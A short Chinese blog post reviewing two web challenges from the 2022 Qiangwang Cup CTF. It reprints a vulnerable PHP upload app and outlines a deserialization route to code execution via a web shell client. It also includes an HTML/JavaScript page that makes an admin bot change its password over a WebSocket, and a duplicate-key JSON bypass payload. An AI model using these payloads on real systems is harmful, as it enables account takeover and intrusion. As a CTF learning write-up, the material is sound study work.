2022强网杯web 部分题目学习

2022qwb
ctf
Publish Date:   2022-08-11
Update Date:   2022-08-29
Word Count:   516
Read Times:   2 Min
Read Count:  

2022强网杯web 部分题目学习

好久没有发博客了,最近同时开了好几个坑,都还没有写完,电脑还坏了,拖了一段时间,先看看qwb的web,感觉很有水平,没有找到环境,所以只是看着WP回忆了回忆。

RceFile

www.zip获取源码
upload.php

<?php
include "config.inc.php";

$file = $_FILES["file"];
if ($file["error"] == 0) {
    if($_FILES["file"]['size'] > 0 && $_FILES["file"]['size'] < 102400) {
        $typeArr = explode("/", $file["type"]);
        $imgType = array("png","jpg","jpeg");
        if(!$typeArr[0]== "image" | !in_array($typeArr[1], $imgType)){
            exit("type error");
        }
        $blackext = ["php", "php5", "php3", "html", "swf", "htm","phtml"];
        $filearray = pathinfo($file["name"]);
        $ext = $filearray["extension"];
        if(in_array($ext, $blackext)) {
            exit("extension error");
        }
        $imgname = md5(time()).".".$ext;
        if(move_uploaded_file($_FILES["file"]["tmp_name"],"./".$imgname)) {
            array_push($userfile, $imgname);
            setcookie("userfile", serialize($userfile), time() + 3600*10);
            $msg = e("file: {$imgname}");
            echo $msg;
        } else {
            echo "upload failed!";
        }
    }
}else{
    exit("error");
}
?>

showfile.php

<?php
include 'config.inc.php';

foreach ($userfile as $file){
    $file=e($file);
    echo "<li><a href=\"./{$file}\" target=\"_blank\">" . $file . "</a></li>\n";
}
?>

index.php

<?php
include "config.inc.php";
?>

config.inc.php

<?php
spl_autoload_register();
error_reporting(0);

function e($str){
    return htmlspecialchars($str);
}
$userfile = empty($_COOKIE["userfile"]) ? [] : unserialize($_COOKIE["userfile"]);
?>

类似题目2017湖湘杯-Writeup web400

spl_autoload_register会⾃动include inc⽂件。
传⼀个扩展名为inc的⽂件,将imagetype改一下。
再访问/showfile.php,,cookie序列化⼀个上传⽂件名的类,rce。

具体原理还不清楚,貌似是cookie 反序列化执行命令。
用蚁剑连接的时候带上cookie即可。

babyweb

有三个功能,help,更改密码和访问页面。
想要登陆admin账户,想到可以让admin访问一个js页面更改密码()

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8"> 
        <title></title>
    </head> 
    <body>
        <button id="btn" type="button">点我发送请求</button>
    </body> 
    <script type="text/javascript" src="js/jquery.js" ></script> <script>
        
    ws = new WebSocket("ws://127.0.0.1:8888/bot");
    ws.onopen = function () {
        var msg = "changepw 123456";
        ws.send(msg);
        document.getElementById("sendbox").value = "";
        document.getElementById("chatbox").append("你: " + msg + "\r\n");
     }
    </script>
</html>

登陆进去的页面不太清楚,后续步骤看WP。
要购买hint,代码审计,根据python go的json解析不⼀致绕过即可。

{"product":[{"id":1,"num":0},{"id":2,"num":0}],"product":[{"id":1,"num":3},
{"id":2,"num":3}]}

总结

qwb确实都是高手题,还是得多学学。

Author: kingkb
Link: http://kingofkb.github.io/2022/08/11/2022%E5%BC%BA%E7%BD%91%E6%9D%AFweb%20%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%AD%A6%E4%B9%A0/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !
2022qwb